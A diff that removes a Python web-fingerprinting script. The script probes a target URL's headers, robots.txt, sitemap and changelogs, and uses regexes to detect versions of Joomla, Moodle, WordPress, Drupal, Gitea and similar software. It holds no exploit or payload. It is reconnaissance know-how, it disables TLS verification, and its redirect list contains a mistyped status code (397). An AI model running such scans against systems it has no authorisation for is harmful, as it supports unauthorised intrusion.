- elif parts.scheme not in ["http","https"]: - print("[-] Unsupported URL scheme:", parts.scheme) - exit(1) - else: - self.url = url - self.scheme = parts.scheme - - def resolve(self, uri): - if uri is None or uri.strip() == "": - return self.url - elif urllib.parse.urlparse(uri).scheme != "": - return uri - - target = self.url - if not target.endswith("/"): - target += "/" - if uri.startswith("/"): - uri = uri[1:] - - return target + uri - - def do_get(self, uri, **args): - - uri = self.resolve(uri) - if self.verbose: - sys.stdout.write("GET %s: " % uri) - - res = self.session.get(uri, headers=self.headers, cookies=self.cookies, verify=False, **args) - if self.verbose: - sys.stdout.write("%d %s\n" % (res.status_code, res.reason)) - - return res - - def parseCookies(self, cookie_list): - self.cookies = { } - if cookie_list: - for cookie in cookie_list: - cookie = cookie.strip() - if "=" in cookie: - index = cookie.find("=") - key, val = cookie[0:index], cookie[index+1:] - self.cookies[key] = val - else: - self.cookies[cookie] = "" - - def scan(self): - print("[ ] Retrieving:", self.url) - - uri = "/" - while True: - startPage = self.do_get(uri, allow_redirects=False) - if startPage.status_code in [301, 302, 397, 308]: - uri = startPage.headers["Location"] - if urllib.parse.urlparse(uri).scheme == "https" and self.scheme == "http": - self.url = self.url.replace("http","https",1) - self.scheme = "https" - - print("[+] Server redirecting to:", uri) - else: - break - - self.analyseHeaders(startPage) - if "text/html" in startPage.headers["Content-Type"]: - self.analyseHtml(startPage) - elif "text/xml" in startPage.headers["Content-Type"]: - self.analyseXml(startPage) - - self.analyseRobots() - self.analyseSitemap() - self.analyseChangelog() - self.checkJoomlaVersion() - self.checkManifest() - - def checkManifest(self): - url = "/static/manifest.json" - res = self.do_get(url) - if res.status_code == 200: - try: - manifest = json.loads(res.text) - if "name" in manifest: - print("[+] Found manifest name:", manifest["name"]) - except: - pass - - def checkJoomlaVersion(self): - url = "/administrator/manifests/files/joomla.xml" - res = self.do_get(url) - if res.status_code == 200: - soup = BeautifulSoup(res.text, "lxml") - extension = soup.find("extension") - if extension and extension.has_attr("version"): - print("[+] Found Joomla version:", extension["version"]) - - def analyseHeaders(self, res): - phpFound = False - banner_headers = ["Server", "X-Powered-By", "X-Runtime", "X-Version"] - for banner in banner_headers: - if banner in res.headers: - phpFound = phpFound or ("PHP" in res.headers[banner]) - print("[+] %s Header: %s" % (banner, res.headers[banner])) - if not phpFound and "PHPSESSID" in self.session.cookies: - print("[+] PHP detected, unknown version") - - def printMatch(self, title, match, group=1, version_func=str): - if match: - version = "Unknown version" if group is None or len(match.groups()) <= group else version_func(match.group(group)) - print("[+] Found %s: %s" % (title, version)) - return True - return False - - def retrieveMoodleVersion(self, v): - res = requests.get("https://docs.moodle.org/dev/Releases") - soup = BeautifulSoup(res.text, "html.parser") - versionStr = "Unknown" - - for tr in soup.find_all("tr"): - tds = tr.find_all("td") - th = tr.find("th") - if len(tds) == 4 and th and int(tds[1].text.strip()) == v: - versionStr = th.text.strip() - if versionStr.startswith("Moodle "): - versionStr = versionStr[len("Moodle"):].strip() - break - - return "%s (%d)" % (versionStr, v) - - def analyseXml(self,res): - soup = BeautifulSoup(res.text, "lxml") - - title = soup.find("title") - if title: - print("[+] Found XML title:", title.text.strip()) - - generator = soup.find("generator") - if generator: - if generator.has_attr("version"): - print("[+] Found XML Generator version:", generator["version"]) - - def analyseHtml(self, res): - soup = BeautifulSoup(res.text, "html.parser") - - meta_generator = soup.find("meta", {"name":"generator"}) - if meta_generator: - banner = meta_generator["content"].strip() - print("[+] Meta Generator:", banner) - - body = soup.find("body") - if body: - gitea_pattern = re.compile(r"Gitea Version: ([0-9\.]*)") - self.printMatch("Gitea", gitea_pattern.search(body.text)) - - footer = soup.find("footer") - if footer: - content = footer.text.strip() - - gogs_pattern = re.compile(r"(^|\s)Gogs Version: ([a-zA-Z0-9.-]+)($|\s)") - go_pattern = re.compile(r"(^|\s)Go([0-9.]+)($|\s+)") - - self.printMatch("Gogs", gogs_pattern.search(content), 2) - self.printMatch("Go", go_pattern.search(content), 2) - - versionInfo = soup.find("div", {"class": "versionInfo"}) - if versionInfo: - content = versionInfo.text.strip() - - cacti_pattern = re.compile(r"Version ([0-9.]*) .* The Cacti Group") - self.printMatch("Cacti", cacti_pattern.search(content), 1) - - poweredBy = soup.find(id="poweredBy") - if poweredBy: - content = poweredBy.text.strip() - - osticket_pattern = re.compile(r"powered by osTicket") - self.printMatch("OsTicket", osticket_pattern.search(content)) - - moodle_pattern_1 = re.compile(r"^https://download.moodle.org/mobile\?version=(\d+)(&|$)") - moodle_pattern_2 = re.compile(r"^https://docs.moodle.org/(\d+)/") - litecart_pattern = re.compile(r"^https://www.litecart.net") - wordpress_pattern = re.compile(r"/wp-(admin|includes|content)/(([^/]+)/)*(wp-emoji-release.min.js|style.min.css)\?ver=([0-9.]+)(&|$)") - - urls = Crawler(self.url).collect_urls(soup) - for url in urls: - self.printMatch("Moodle", moodle_pattern_1.search(url), version_func=lambda v: self.retrieveMoodleVersion(int(v))) - self.printMatch("Moodle", moodle_pattern_2.search(url), version_func=lambda v: "%d.%d" % (int(v)//10,int(v)%10)) - self.printMatch("Litecart", litecart_pattern.search(url), group=None) - if self.printMatch("Wordpress", wordpress_pattern.search(url), group=5): - print("[ ] You should consider using 'wpscan' for further investigations and more accurate results") - - def analyseRobots(self): - res = self.do_get("/robots.txt", allow_redirects=False) - if res.status_code != 200: - print("[-] robots.txt not found or inaccessible") - return False - - def analyseSitemap(self): - res = self.do_get("/sitemap.xml", allow_redirects=False) - if res.status_code != 200: - print("[-] sitemap.xml not found or inaccessible") - return False - - def analyseChangelog(self): - - drupal_pattern = re.compile("^Drupal ([0-9.]+),") - drupal_found = False - - changelog_files = ["CHANGELOG", "CHANGELOG.txt"] - for file in changelog_files: - res = self.do_get(file, allow_redirects=False) - if res.status_code != 200: - continue - - print("[+] Found:", file) - for line in res.text.split("\n"): - line = line.strip() - if not drupal_found and self.printMatch("Drupal", drupal_pattern.search(line)): - drupal_found = True - - -def banner(): - print(""" -,--------. ,--. ,--------. ,--. ,--. ,--. -'--. .--',---. ,---.,-' '-.'--. .--',---. ,---. | | ,--. ,--. / | / \\ - | | | .-. :( .-''-. .-' | | | .-. || .-. || | \ `' / `| | | () | - | | \ --..-' `) | | | | ' '-' '' '-' '| | \ / | |.--.\ / - `--' `----'`----' `--' `--' `---' `---' `--' `--' `--''--' `--' - - """) - -if __name__ == "__main__": - parser = argparse.ArgumentParser() - parser.add_argument("url", help="The target URI to scan to, e.g. http://example.com:8080/dir/") - parser.add_argument("--proxy", help="Proxy to connect through") # TODO - parser.add_argument("--user-agent", help="User-Agent to use") - parser.add_argument("--cookie", help="Cookies to send", action='append') - parser.add_argument('--verbose', '-v', help="Verbose otuput", action='store_true') - - args = parser.parse_args() - - banner() - - client = WebServiceFinder(args) - client.scan()